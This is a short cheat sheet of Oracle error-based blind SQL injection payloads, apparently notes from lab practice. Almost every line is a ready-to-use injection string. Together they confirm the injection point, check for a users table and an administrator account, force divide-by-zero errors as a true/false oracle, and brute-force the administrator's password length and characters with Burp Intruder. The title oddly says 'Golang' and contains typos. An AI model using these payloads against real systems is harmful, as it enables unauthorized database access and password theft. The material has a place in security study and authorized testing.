# Golang Fast Bling SQLi


Error-based Blind SQL Injection

In this case there is no condition that will make as say this is true and this is false, instead we get the same boolean condition but in a way that it fails or doesn't fail. to do that first we need to validate that we are executing SQL by making it fail with single or double quotes, the get a query that does not make it fail (200 OK).  This is an oracle version, translate queries to make it match.

' and (select 'a' from dual)='a'--

## Table exists?
' and (select 'a' from users where rownum = 1)='a'--

## administrator user exist?
' and (select username from users where username = 'administrator')='administrator'--

## force tiriggering errors
'|| (select case when (1=0) then to_char(1/0) else '' end from dual) ||'
'|| (select case when (1=1) then to_char(1/0) else '' end from users where username = 'administrator') ||' → 500 if administrator user exist

## bruteforcing password, first the length
'|| (select case when (1=1) then to_char(1/0) else '' end from users where username = 'administrator' and length(password)=20) ||'
'|| (select case when (1=1) then to_char(1/0) else '' end from users where username = 'administrator' and substr(password,1,1)='a') ||' → can be bruteforced with BURP intruder
